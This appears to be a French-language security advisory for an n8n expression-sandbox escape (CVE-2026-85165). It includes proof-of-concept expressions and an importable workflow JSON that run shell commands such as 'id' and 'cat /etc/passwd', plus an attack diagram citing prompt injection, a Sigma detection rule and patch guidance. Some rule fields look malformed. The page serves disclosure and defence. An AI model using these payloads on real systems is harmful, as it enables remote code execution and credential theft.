Aller au contenu

CVE-2026-85165 : évasion de sandbox dans le moteur d'expressions N8N

HERMES

SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE

Cible : n8n Automation Platform (Workflow Expression Evaluator Sandbox)
Confiance : 98%
97 / 100
CRITIQUE

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 19 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
⚖️ Divergence & Justification opérationnelle

Le CVSS v3.1 attribue la note de 9.9 (Critique), et le score Hermes Threat Score s'établit à 97 (CRITIQUE). Cette vulnérabilité permet à tout utilisateur pouvant éditer un flux d'échapper au bac à sable JavaScript et de dérober l'ensemble des variables d'environnement de l'hôte.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-85165: n8n Expression Sandbox Escape via Prototype ResolutionVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTn8n Workflow Automation
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in n8n Workflow Automation documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification TechniqueContexte de Menace
Identifiant CVECVE-2026-85165Menaces IA Agentique & Protocole MCP
Produit ciblén8n Automation Platformn8n GmbH
Composant affectéWorkflow Expression Evaluator SandboxOrchestrateur et couche d’outils agentiques
Nature de la failleCWE-94: Code Injection / CWE-1321: Prototype PollutionViolation d’intégrité et d’exécution
Versions vulnérablesall versions prior to 2.36.2Environnements en production
Correctif disponible2.36.2Mise à jour impérative

Les objets helpers exposés dans le contexte d’évaluation ($jmespath, $moment) n’avaient pas leurs prototypes gelés. En chaînant .constructor.constructor, le constructeur Function renvoyé s’exécute dans le contexte global de Node.js et non dans le contexte sécurisé :

// Payload d'expression malveillante
{{
$jmespath.constructor.constructor(
'return process.mainModule.require("child_process").execSync("id").toString()'
)()
}}
+----------------------------------------------------------------------------------------------------+
| CYCLE D'ATTAQUE CVE-2026-85165 |
+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt]
│
│ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur
▼
[n8n Automation Platform]
│
├───► 1. Ingestion par Workflow Expression Evaluator Sandbox
│ - Échec de validation, absence de filtrage ou contournement de sandbox
│
├───► 2. Exécution / Mutation d'état
│ - Exécution de commandes OS ou exfiltration d'identifiants
│
▼
[Infrastructure Cible Compromise]
│
└───► Vol de données, prise de contrôle du serveur ou persistance
+----------------------------------------------------------------------------------------------------+

{
"nodes": [
{
"name": "Code Execution Node",
"type": "n8n-nodes-base.set",
"typeVersion": 2,
"position": [250, 300],
"parameters": {
"values": {
"string": [
{
"name": "rce_output",
"value": "={{ $jmespath.constructor.constructor('return process.mainModule.require("child_process").execSync("cat /etc/passwd").toString()')() }}"
}
]
}
}
}
]
}

title: n8n Sandbox Escape Expression Evaluation
id: 85165c01-e165-4a1b-8f21-n8nsandbox01
status: high
description: Detects attempts to walk prototype constructors or invoke process.mainModule within n8n workflow expressions.
author: Hermes Codex Detection Engineering
date: 2026-09-05
logsource:
product: n8n
service: execution
detection:
selection:
payload|contains:
- 'constructor.constructor'
- 'process.mainModule'
- 'child_process'
- '__proto__'
condition: selection
level: critical

  1. Appliquer les correctifs : mettre à jour n8n Automation Platform vers la version 2.36.2 sans délai.
  2. Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
  3. Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
  4. Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.